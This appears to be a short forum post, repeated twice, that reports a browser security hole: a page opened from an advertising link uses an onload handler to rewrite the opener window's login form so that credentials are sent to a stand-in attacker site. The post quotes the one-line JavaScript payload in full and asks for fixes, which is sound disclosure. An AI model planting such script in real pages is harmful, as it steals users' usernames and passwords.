R
riku at wap ice dot com
Security hole for dummies:
Let's say I have a login screen with a lots of advertisement (links).
One of those links is opened in a new window, and there is the following:
<body
onload="opener.document.forms[0].action='http://www.hackerz.com/PasswordDatabase.php';">
After clicking the link and reading the advertisement, I go on "logging
in" on the first window. After I submit, the form data, username,
password and all is submitted to a third party..
Is this old news? (I don't follow these news too often..) Any comments,
fixes, anything?
Let's say I have a login screen with a lots of advertisement (links).
One of those links is opened in a new window, and there is the following:
<body
onload="opener.document.forms[0].action='http://www.hackerz.com/PasswordDatabase.php';">
After clicking the link and reading the advertisement, I go on "logging
in" on the first window. After I submit, the form data, username,
password and all is submitted to a third party..
Is this old news? (I don't follow these news too often..) Any comments,
fixes, anything?